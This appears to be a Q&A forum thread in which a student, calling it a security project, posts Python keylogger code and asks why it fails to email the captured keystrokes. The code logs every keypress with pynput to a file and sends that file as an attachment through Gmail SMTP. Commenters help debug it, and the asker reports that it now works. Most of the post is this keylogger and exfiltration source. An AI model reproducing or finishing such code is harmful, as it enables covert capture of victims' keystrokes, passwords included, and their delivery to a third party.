# E-mail sending python code doesn't work with keylogging execution code

Tags: python, email

I am the student to produce a Python keylogging program as a security project.

I created a code to make keylogging file and send its file(keylogging file) automatically by email. and It runs without any warning from complier, but I can't receive any email from this.

I already checked spam mail box, I waited enough time to send email.
Just email sending code alone, email just sends a few moment ago after execute the code. but with keylogging code, it doesn't work(email doesn't send)

Please tell me what I should do.

keylogging.py

```
from pynput.keyboard import Key, Listener
import logging
import logging.handlers
import os
import time
import datetime

import mailFunc

import threading

if os.path.isdir('C:\\Keylogging') == False:
    os.mkdir('C:\\Keylogging')

log_dir = ''

logging.basicConfig(filename=(log_dir + "C:\\Keylogging\\Key.txt"),
                    level=logging.DEBUG, format='["%(asctime)s". %(message)s]')

def on_press(key):
    logging.info('"{0}"'.format(key))

with Listener(on_press = on_press) as listener:
    listener.join()

threading.Timer(60.0, mailFunc.autoEmailSend()).start()
```

mailFunc.py(It sends an email)

```
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.mime.base import MIMEBase
from email import encoders

import os
import time
import schedule

def autoEmailSend():
        #hided because it is my private information
        email_user = '(email id)'         
        email_password = '(email password)'        
        email_send = '(email id)
       

        subject = 'Keylogging Auto Report'

        msg = MIMEMultipart()
        msg['From'] = email_user
        msg['To'] = email_send
        msg['Subject'] = subject

        body = 'Keylogging Report, Time : ' + time.strftime('%c', time.localtime(time.time()))
        msg.attach(MIMEText(body,'plain'))

        filename='C:\\Keylogging\\Key.txt'  
        attachment = open(filename,'rb')

        part = MIMEBase('application','octet-stream')
        part.set_payload((attachment).read())
        encoders.encode_base64(part)
        part.add_header('Content-Disposition',"attachment", filename= os.path.basename(filename))
        msg.attach(part)

        text = msg.as_string()
        server = smtplib.SMTP('smtp.gmail.com',587)
        server.starttls()
        server.login(email_user,email_password)

        server.sendmail(email_user,email_send,text)
        server.quit()

        print("Mail Sended at " + time.strftime('%c', time.localtime(time.time())))
```

I haven't had much programming yet, and it's my first time to leave a question at a forum like this, and I'm just a student learning English, so the questions can be unskilled. I ask for your understanding.

Comment: Welcome to stackoverflow. Please read [ask] and [edit] your question. The problem is email sending, so the keylogger code is just distracting; remove it. What happens when you run your email sending code? Any errors? Did you check your spam folder? Did you give it enough time? (Some emails can take a few hours or days till they bounce.)

Comment: @Graham I think you should test your mail function separately first. Try to get it to send a simple email unrelated to all this keylogging. Examine the logs carefully, it could be as simple as the email id / password of the mailserver being incorrect. Once you've got that working separately, you just need to put everything together.

Comment: @Alterlife thanks to your comment, I tried to test my email code sparately first and It worked. And as a result of applying the original code again, the code works well. Thank you for your help despite of my question was unskilled.